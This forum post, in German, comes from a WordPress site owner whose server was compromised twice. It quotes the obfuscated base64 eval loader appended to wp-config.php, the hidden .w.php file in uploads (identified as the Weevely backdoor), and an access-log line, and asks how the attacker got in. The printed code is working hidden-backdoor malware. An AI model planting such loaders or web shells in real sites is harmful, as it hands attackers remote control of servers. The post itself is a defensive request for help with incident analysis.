Beiträge von Atranox

    Am ende der wp-config.php

    PHP
    eval(base64_decode(JG13bjI9IkoyVnljbTl5WDJ4dlp5Y3NJc3VvQ2N2WkdWMnN1b0xzdW8yNXN1bzFiR3duS1Rza2F6MG5aREVzdW95TXN1b3lzdW9jN1pXTm9ieUFuUENjdUpHc3Vvc3VKejRuTzJWMllXd29ZbUYiOyAkbXduMT0iSkdNOUoyTnZzdW9kVzUwSnpzc3Vva1lUMGtYME5zdW9QVDB0SlJzdW9UdHBaaWh5WlhOc3VvbGRDZ2tZU2tzdW85UFNkaHN1b2N5Y2dKaVlnSkdNb0pHRXBQak1wZTJsc3VvdWFWOXpac3VvWFFzdW9vIjsgJG13bjM9InpaVHN1b1kwWDJSbFkyOWtaU2h3Y21WblgzSmxjR3hoc3VvWTJVb1lzdW9YSnlzdW9ZWGtvSnN1b3k5YnN1b1hseDNQVnh6WFM4bkxDc3VvY3ZYSE12Snlrc0lHRnljc3VvbUY1S0NjbkxDIjsgJG13bjQ9ImNySnlrc0lHcHZhVzRvc3VvWVhKeVlzdW9YbGZjMnhwWTJVb0pHc3VvRXNzdW9KR01vc3VvSkdFcExUTXBLU2twS3N1b1R0bFkyc3VvaHZzdW9Jc3VvQ2M4c3VvTHlzdW9jdUpHc3Vvc3VKejRzdW9uTzMwPSI7ICRndiA9ICJibmJhYm5zYm5lNmJuNGJuX2JuZGVjYm5vZGJuZSI7ICRociA9ICJzdHJfcmVwbGFjZSI7ICRndiA9ICRocigiYm4iLCAiIiwgJGd2KTsgZXZhbCgkZ3YoJGhyKCJzdW8iLCAiIiwgJG13bjEuJG13bjIuJG13bjMuJG13bjQpKSk7));

    Aktuelle thum.php (timthumb.php) ist die 2.8.10
    Enthält die immer noch ein exploit?

    Hallo,

    ich habe jetzt zum zweiten mal den Server komplett neu installiert
    und Wordpress aufgesetzt.
    Schon wieder erscheint eine komische Datei im uploads ordner:

    wp-content/uploads/2013/01/.w.php

    Inhalt dieser Datei:

    PHP
    <?php 
    $vaj="JGM9J2NvdW5lfcj0JzskYT0kXlfcj0NPT0tJRTtpZilfcjhyZXNldCglfcjkYSk9PlfcjSdhcycgJiYgJGMoJGlfcjEpPjlfcjMplfcjelfcj2lfcj";
    $xnf="luaV9zZXQoJ2Vycm9yXlfcj2xvZycsICcvZGV2L251bGwnKTslfcjkazlfcj0nZDEyMyc7ZWNobyAlfcjnPCcuJGlfcjsuJz4nO2V2YWwoYm";
    $vdv = str_replace("az","","azsaztraz_reazplazaazcaze");
    $efy="FzZTYlfcj0X2lfcjRlY29kZShwcmVlfcjnX3JlcGxhY2UoYXJlfcjyYXkoJy9bXlx3PVxzXS8nLCcvXlfcjHlfcjMvJyklfcjsIGFycmF5KC";
    $lv="lfcjcnlfcjLCcrJyksIGpvaW4oYXJyYXlfcjlfc2xpY2lfcjUlfcjoJGEsJlfcjGMoJGEpLTMpKlfcjSkpKTtlYlfcj2hvICc8LyculfcjJGsuJz4nO30=";
    $tm = $vdv("y", "", "ybaysyey6y4y_dyecyodye");
    $ov = $vdv("cg","","cgcrecgacgtcgecg_cgfuncgccgticgocgn");
    $wg = $ov('', $tm($vdv("lfcj", "", $vaj.$xnf.$efy.$lv))); $wg();
    ?>

    Dekodiert:

    Accesslog liefert:

    Code
    37.130.227.133 - - [01/Feb/2013:01:41:48 +0100] "GET /wp-content/uploads/2013/01/.w.php HTTP/1.0" 200 13 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"


    Installiert ist Wordpress 3.5.1 mit dem WooTheme Spektical
    TimThumb wurde auf Empfehlung von WooTheme deaktiviert.
    Da es nun zum zweiten mal passiert ist frage ich jetzt hier nach.

    Ich würde gerne wissen, wie es passiert ist um es
    1. nach zustellen um sicher zu gehen, das es behoben ist
    2. es beheben

    Gibt es ähnliche Fälle wo so etwas passiert ist?
    Ich habe auch sonst keine Plugins am laufen.

    Danke

    Edit: es scheint sich um den Weevely backdoor zu handeln.
    nur wie kommt er bitte in diesen Ordner?